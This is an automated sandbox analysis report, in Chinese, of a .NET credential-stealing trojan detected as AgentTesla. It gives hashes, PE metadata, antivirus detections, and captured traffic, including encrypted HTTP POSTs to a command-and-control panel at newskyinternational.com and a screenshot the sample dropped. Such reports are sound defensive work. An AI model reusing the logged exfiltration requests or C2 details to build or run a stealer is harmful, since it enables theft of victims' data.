分析类型 | 虚拟机标签 | 开始时间 | 结束时间 | 持续时间 |
---|---|---|---|---|
文件 (Windows) | win7-sp1-x64-shaapp01-1 | 2018-07-20 20:07:05 | 2018-07-20 20:09:29 | 144 秒 |
文件名 | server.exe |
---|---|
文件大小 | 376320 字节 |
文件类型 | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
MD5 | 949755b8f6a4f52d5fd2f112ecb1ed00 |
SHA1 | 0ce5112bdff5a2e9190d8e2a8c2f3e248379dd2b |
SHA256 | aa7fdcc43458b2675b42c4c8a58bcb088745124d6c81d8e2d712ff9ac9aba20d |
SHA512 | 4d5886dd37875d68897c634b52925008da3c37a1016ab56e65b2da5f425a0a732f72cc2fa47cb24950956d94cf77d3bf9abbecbe6b3b5e8517d6422a0dd27bf9 |
CRC32 | C73EB523 |
Ssdeep | 6144:Xf+rYqtV7UW6kVB1RUNmMBME34m7IJl1:mYqtV7UWndRUcSa1 |
Yara | 登录查看Yara规则 |
样本下载 提交误报 |
直接 | IP | 安全评级 | 地理位置 |
---|---|---|---|
否 | 162.241.225.102 | 美国 | |
否 | 162.88.100.200 | 美国 |
域名 | 安全评级 | 响应 |
---|---|---|
checkip.dyndns.org |
A 131.186.113.135 A 162.88.100.200 A 216.146.43.71 A 131.186.113.136 A 216.146.38.70 CNAME checkip.dyndns.com A 162.88.96.194 |
|
newskyinternational.com | 未知 | A 162.241.225.102 |
初始地址 | 0x00400000 |
---|---|
入口地址 | 0x004349ce |
声明校验值 | 0x00000000 |
实际校验值 | 0x00060252 |
最低操作系统版本要求 | 4.0 |
编译时间 | 2018-07-10 02:27:45 |
载入哈希 | f34d5f2d4577ed6d9ceec516c1f5a744 |
图标 | |
图标精确哈希值 | c4cca15f3b1016361fccea63e54470e6 |
图标相似性哈希值 | dba668c6e0835c285516a4ab815b014e |
名称 | 虚拟地址 | 虚拟大小 | 原始数据大小 | 特征 | 熵(Entropy) |
---|---|---|---|---|---|
.text | 0x00002000 | 0x000329d4 | 0x00032a00 | IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ | 7.99 |
.rsrc | 0x00036000 | 0x00028e7c | 0x00029000 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ | 3.11 |
.reloc | 0x00060000 | 0x0000000c | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ | 0.10 |
名称 | 偏移量 | 大小 | 语言 | 子语言 | 熵(Entropy) | 文件类型 |
---|---|---|---|---|---|---|
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_ICON | 0x0005e4ac | 0x00000468 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.09 | GLS_BINARY_LSB_FIRST |
RT_GROUP_ICON | 0x0005e914 | 0x00000148 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 3.37 | MS Windows icon resource - 23 icons, 32x32, 16 colors |
RT_VERSION | 0x0005ea5c | 0x00000233 | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.31 | ASCII text, with CRLF line terminators |
RT_MANIFEST | 0x0005ec90 | 0x000001ea | LANG_NEUTRAL | SUBLANG_NEUTRAL | 5.00 | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |
名称 | server |
---|---|
版本 | 14.18.10.14 |
名称 | 版本 |
---|---|
mscorlib | 4.0.0.0 |
Microsoft.VisualBasic | 10.0.0.0 |
System | 4.0.0.0 |
类型 | 名称 | 值 |
---|---|---|
Property | [System]System.ComponentModel.Design.HelpKeywordAttribute | My.Comput |
Assembly | [mscorlib]System.Reflection.AssemblyCompanyAttribute | Family Dollar Stores In |
Assembly | [mscorlib]System.Reflection.AssemblyCopyrightAttribute | (c) 2016 Family Dollar Stores In |
Assembly | [mscorlib]System.Reflection.AssemblyDescriptionAttribute | Family Dollar Stores Inc. Hiipo R |
Assembly | [mscorlib]System.Reflection.AssemblyTitleAttribute | Family Dollar Stores In |
Assembly | [mscorlib]System.Reflection.AssemblyFileVersionAttribute | 7.14.13 |
Assembly | [mscorlib]System.Reflection.AssemblyProductAttribute | Family Dollar Stores Inc. Hiipo R |
Property | [System]System.ComponentModel.Design.HelpKeywordAttribute | My.Applicati |
Property | [System]System.ComponentModel.Design.HelpKeywordAttribute | My.Us |
装载 | 类型名称 |
---|---|
Microsoft.VisualBasic | Microsoft.VisualBasic.ApplicationServices.ApplicationBase |
Microsoft.VisualBasic | Microsoft.VisualBasic.ApplicationServices.User |
Microsoft.VisualBasic | Microsoft.VisualBasic.CompilerServices.Conversions |
Microsoft.VisualBasic | Microsoft.VisualBasic.CompilerServices.NewLateBinding |
Microsoft.VisualBasic | Microsoft.VisualBasic.CompilerServices.Operators |
Microsoft.VisualBasic | Microsoft.VisualBasic.CompilerServices.StandardModuleAttribute |
Microsoft.VisualBasic | Microsoft.VisualBasic.Devices.Computer |
Microsoft.VisualBasic | Microsoft.VisualBasic.HideModuleNameAttribute |
Microsoft.VisualBasic | Microsoft.VisualBasic.MyGroupCollectionAttribute |
System | System.CodeDom.Compiler.GeneratedCodeAttribute |
System | System.ComponentModel.Design.HelpKeywordAttribute |
System | System.ComponentModel.EditorBrowsableAttribute |
System | System.ComponentModel.EditorBrowsableState |
System | System.IO.Compression.CompressionMode |
System | System.IO.Compression.GZipStream |
mscorlib | System.Activator |
mscorlib | System.Boolean |
mscorlib | System.Byte |
mscorlib | System.Convert |
mscorlib | System.Diagnostics.DebuggerHiddenAttribute |
mscorlib | System.IDisposable |
mscorlib | System.IO.MemoryStream |
mscorlib | System.IO.Stream |
mscorlib | System.Int32 |
mscorlib | System.IntPtr |
mscorlib | System.Object |
mscorlib | System.Reflection.Assembly |
mscorlib | System.Reflection.AssemblyCompanyAttribute |
mscorlib | System.Reflection.AssemblyCopyrightAttribute |
mscorlib | System.Reflection.AssemblyDescriptionAttribute |
mscorlib | System.Reflection.AssemblyFileVersionAttribute |
mscorlib | System.Reflection.AssemblyProductAttribute |
mscorlib | System.Reflection.AssemblyTitleAttribute |
mscorlib | System.Resources.ResourceManager |
mscorlib | System.Runtime.CompilerServices.CompilationRelaxationsAttribute |
mscorlib | System.Runtime.CompilerServices.CompilerGeneratedAttribute |
mscorlib | System.Runtime.CompilerServices.RuntimeCompatibilityAttribute |
mscorlib | System.Runtime.CompilerServices.RuntimeHelpers |
mscorlib | System.Runtime.InteropServices.ComVisibleAttribute |
mscorlib | System.Runtime.InteropServices.DllImportAttribute |
mscorlib | System.Runtime.InteropServices.Marshal |
mscorlib | System.RuntimeTypeHandle |
mscorlib | System.STAThreadAttribute |
mscorlib | System.ThreadStaticAttribute |
mscorlib | System.Type |
防病毒引擎/厂商 | 病毒名/规则匹配 | 病毒库日期 |
---|---|---|
Bkav | 未发现病毒 | 20180719 |
MicroWorld-eScan | Gen:Variant.Razy.360881 | 20180720 |
CMC | 未发现病毒 | 20180720 |
CAT-QuickHeal | 未发现病毒 | 20180720 |
McAfee | Trojan-FPRM!949755B8F6A4 | 20180720 |
Cylance | Unsafe | 20180720 |
K7AntiVirus | Trojan ( 00533ba61 ) | 20180720 |
K7GW | Trojan ( 00533ba61 ) | 20180720 |
TheHacker | 未发现病毒 | 20180720 |
Arcabit | Trojan.Razy.D581B1 | 20180720 |
Invincea | heuristic | 20180717 |
Baidu | Win32.Trojan.WisdomEyes.16070401.9500.9999 | 20180717 |
Babable | 未发现病毒 | 20180406 |
F-Prot | 未发现病毒 | 20180720 |
Symantec | Trojan.Gen.2 | 20180720 |
ESET-NOD32 | a variant of MSIL/Kryptik.OHR | 20180720 |
TrendMicro-HouseCall | TROJ_GEN.R020C0DGJ18 | 20180720 |
Paloalto | generic.ml | 20180720 |
ClamAV | Win.Packed.Razy-6615989-0 | 20180720 |
Kaspersky | HEUR:Trojan.Win32.Agent.gen | 20180720 |
BitDefender | Gen:Variant.Razy.360881 | 20180720 |
NANO-Antivirus | Trojan.Win32.Kryptik.ffmqvm | 20180720 |
ViRobot | 未发现病毒 | 20180720 |
SUPERAntiSpyware | 未发现病毒 | 20180720 |
Rising | 未发现病毒 | 20180720 |
Ad-Aware | Gen:Variant.Razy.360881 | 20180720 |
Emsisoft | Gen:Variant.Razy.360881 (B) | 20180720 |
Comodo | .UnclassifiedMalware | 20180720 |
F-Secure | Gen:Variant.Razy.360881 | 20180720 |
DrWeb | Trojan.PWS.Stealer.19347 | 20180720 |
VIPRE | 未发现病毒 | 20180720 |
TrendMicro | TROJ_GEN.R020C0DGJ18 | 20180720 |
McAfee-GW-Edition | BehavesLike.Win32.Generic.fh | 20180720 |
Sophos | Mal/Generic-S | 20180720 |
Ikarus | Trojan-Spy.Agent | 20180720 |
Cyren | W32/Trojan.WREP-2865 | 20180720 |
Jiangmin | 未发现病毒 | 20180720 |
Webroot | 未发现病毒 | 20180720 |
Avira | HEUR/AGEN.1025206 | 20180720 |
Antiy-AVL | HackTool[VirTool]/MSIL.Injector | 20180720 |
Kingsoft | 未发现病毒 | 20180720 |
Endgame | malicious (high confidence) | 20180711 |
AegisLab | Worm.MSIL.Agent.lmXx | 20180720 |
ZoneAlarm | HEUR:Trojan.Win32.Agent.gen | 20180720 |
Avast-Mobile | 未发现病毒 | 20180720 |
GData | Gen:Variant.Razy.360881 | 20180720 |
TACHYON | 未发现病毒 | 20180719 |
AhnLab-V3 | Trojan/Win32.Upatre.R231775 | 20180720 |
ALYac | Trojan.Agent.Upatre | 20180720 |
AVware | 未发现病毒 | 20180720 |
MAX | malware (ai score=98) | 20180720 |
VBA32 | 未发现病毒 | 20180720 |
Malwarebytes | Spyware.AgentTesla | 20180720 |
Panda | Trj/GdSda.A | 20180720 |
Zoner | 未发现病毒 | 20180719 |
Tencent | 未发现病毒 | 20180720 |
Yandex | 未发现病毒 | 20180720 |
SentinelOne | static engine - malicious | 20180701 |
eGambit | 未发现病毒 | 20180720 |
Fortinet | MSIL/Kryptik.OHR!tr | 20180720 |
AVG | Win32:GenX | 20180720 |
Cybereason | malicious.bdff5a | 20180225 |
Avast | Win32:GenX | 20180720 |
CrowdStrike | malicious_confidence_100% (D) | 20180530 |
Qihoo-360 | HEUR/QVM03.0.9DB1.Malware.Gen | 20180720 |
直接 | IP | 安全评级 | 地理位置 |
---|---|---|---|
否 | 162.241.225.102 | 美国 | |
否 | 162.88.100.200 | 美国 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49170 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49171 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49172 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49173 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49174 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49175 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49176 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49177 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49178 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49181 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49182 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49183 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49186 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49187 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49188 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49189 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49190 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49191 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49192 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49193 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49194 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49195 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49197 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49198 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49199 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49202 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49203 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49204 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49205 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49206 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49208 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49209 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49211 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49212 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49213 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49214 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49215 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49216 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49167 | 162.88.100.200 checkip.dyndns.org | 80 |
192.168.122.201 | 49168 | 162.88.100.200 checkip.dyndns.org | 80 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 52966 | 192.168.122.1 | 53 |
192.168.122.201 | 60990 | 192.168.122.1 | 53 |
域名 | 安全评级 | 响应 |
---|---|---|
checkip.dyndns.org |
A 131.186.113.135 A 162.88.100.200 A 216.146.43.71 A 131.186.113.136 A 216.146.38.70 CNAME checkip.dyndns.com A 162.88.96.194 |
|
newskyinternational.com | 未知 | A 162.241.225.102 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 49170 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49171 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49172 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49173 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49174 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49175 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49176 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49177 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49178 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49181 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49182 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49183 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49186 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49187 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49188 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49189 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49190 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49191 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49192 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49193 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49194 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49195 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49197 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49198 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49199 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49202 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49203 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49204 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49205 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49206 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49208 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49209 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49211 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49212 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49213 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49214 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49215 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49216 | 162.241.225.102 newskyinternational.com | 80 |
192.168.122.201 | 49167 | 162.88.100.200 checkip.dyndns.org | 80 |
192.168.122.201 | 49168 | 162.88.100.200 checkip.dyndns.org | 80 |
源地址 | 源端口 | 目标地址 | 目标端口 |
---|---|---|---|
192.168.122.201 | 52966 | 192.168.122.1 | 53 |
192.168.122.201 | 60990 | 192.168.122.1 | 53 |
URI | HTTP数据 |
---|---|
URL专业沙箱检测 -> http://checkip.dyndns.org/ | GET / HTTP/1.1 Host: checkip.dyndns.org Connection: Keep-Alive |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 286 Expect: 100-continue Connection: Keep-Alive |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 324 Expect: 100-continue |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 314 Expect: 100-continue |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 314 Expect: 100-continue p=EmZKrUTp3d4tHBRf%2BrVRl83BzwyEp7vTyKfJ0MpC1BYQdNU/LNTV5fVLeLuMBGfNrRlOS1O2B8w0m/iQBuFuE1/ibaMcbAS1d/SUMXDXl8SaFwcUViuVQGbg1R03ncZet2f%2BR2i%2BmeoTKIUeUXT6tBGeNAa5WQqUVdlYP4LTrR9hTgOk4BYWOSchAPQ9Xhckq%2BIllD7imBU/9mp0pt8DTahIO9aEFcQHO%2BVEv0ohap47biDprqlQqmzpyXEr/M/ZVXllPgf09svD8fSEnRpoQ%2Boir5cZMIx0R5Wu0lWsIZs= |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 288 Expect: 100-continue Connection: Keep-Alive |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 286 Expect: 100-continue |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 322 Expect: 100-continue |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 66596 Expect: 100-continue |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 322 Expect: 100-continue p=BEmO9zSQxPNbRWmt35dl4UcdWWwNeJ4HECQ18lSSNXA34mEa6qd1GWWABz/ATQM/x3i6O/4tx8dZBMmKg67VT4hR1MfbiT8ZuRlRVcMP5xdr99vcMXlBF1VEm4i3A/WamBzqyKQ/0Dd7pX6XGN3EmzVdYqwxQYZtaN0o%2Bb5sxNOR5%2BId7PBRPjXWHGzYIk9wY47RexXxFjzioIi9Ioh9egFUJ97067nFHUoZAs2ej5W5bZ%2BncBLJAswAE1QcA9Uz2Xka6YuOzKsU3i7Wi/HNg5z7MvWeONXGIb97HKjRFfb%2BA6YF9dDS6Q== |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 324 Expect: 100-continue p=BEmO9zSQxPNbRWmt35dl4UcdWWwNeJ4HECQ18lSSNXA34mEa6qd1GWWABz/ATQM/x3i6O/4tx8dZBMmKg67VT4hR1MfbiT8ZymcaUfX9lABOPpU0LBSO%2B1VEm4i3A/WamBzqyKQ/0Dd7pX6XGN3EmzVdYqwxQYZtaN0o%2Bb5sxNOR5%2BId7PBRPjXWHGzYIk9wY47RexXxFjzioIi9Ioh9egFUJ97067nFHUoZAs2ej5W5bZ%2BncBLJAswAE1QcA9Uz2Xka6YuOzKsU3i7Wi/HNg5z7MvWeONXGIb97HKjRFfb%2BA6YF9dDS6Q== |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 66598 Expect: 100-continue |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 68174 Expect: 100-continue |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 286 Expect: 100-continue p=G1DZYwdIiDZ6V83seaZCmb3lNHQ9jFz9S1trgT9pB0gEhegVG5AXSLq/eNOcoam8PExE/dGbiFbZdI6uJmXlSdqYLYuTR%2BlFVl%2B5deG0RnTTo6nFc1M9tx0%2BRo7WXetRdIHkmVMMSeqH%2BEroM7yttDzosvKfKgB%2BJ07oqT/YvQ6CPNW2%2BCETCU6oIlO9XYyrEy6/hYeF%2BgkfRc9xSEfZhh/7Wk0khJ4zZJ3cjEvXDxJcQWA739/yDfxk7Bq%2BMPIeFuYVGUohcCs= |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 68156 Expect: 100-continue |
URL专业沙箱检测 -> http://newskyinternational.com/WebPanel/api.php | POST /WebPanel/api.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/4.0 (.NET CLR 3.5.30729) Content-Type: application/x-www-form-urlencoded Host: newskyinternational.com Content-Length: 326 Expect: 100-continue |
无SMTP流量.
无IRC请求.
无ICMP流量.
无 CIF 结果
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Signature | Category |
---|---|---|---|---|---|---|---|---|
2018-07-20 20:07:24.400670+0800 | 192.168.122.201 | 49168 | 162.88.100.200 | 80 | TCP | 2021378 | ET POLICY External IP Lookup - checkip.dyndns.org | Potential Corporate Privacy Violation |
2018-07-20 20:07:23.913079+0800 | 192.168.122.201 | 49167 | 162.88.100.200 | 80 | TCP | 2021378 | ET POLICY External IP Lookup - checkip.dyndns.org | Potential Corporate Privacy Violation |
No TLS
No Suricata HTTP
文件名 | screen.jpeg |
---|---|
相关文件 |
C:\Users\test\AppData\Roaming\ScreenShot\screen.jpeg
|
文件大小 | 36124 字节 |
文件类型 | JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 800x600, frames 3 |
MD5 | e6b37f111dca68dba5f9e9040d501734 |
SHA1 | 0b80a3316d72fa418ced2b314b33d93f2b585583 |
SHA256 | f0674bd5895d25386962ac7733404f4a6e1f31129bcf9ac6735cf425bc1a2b0a |
CRC32 | 4F6C0213 |
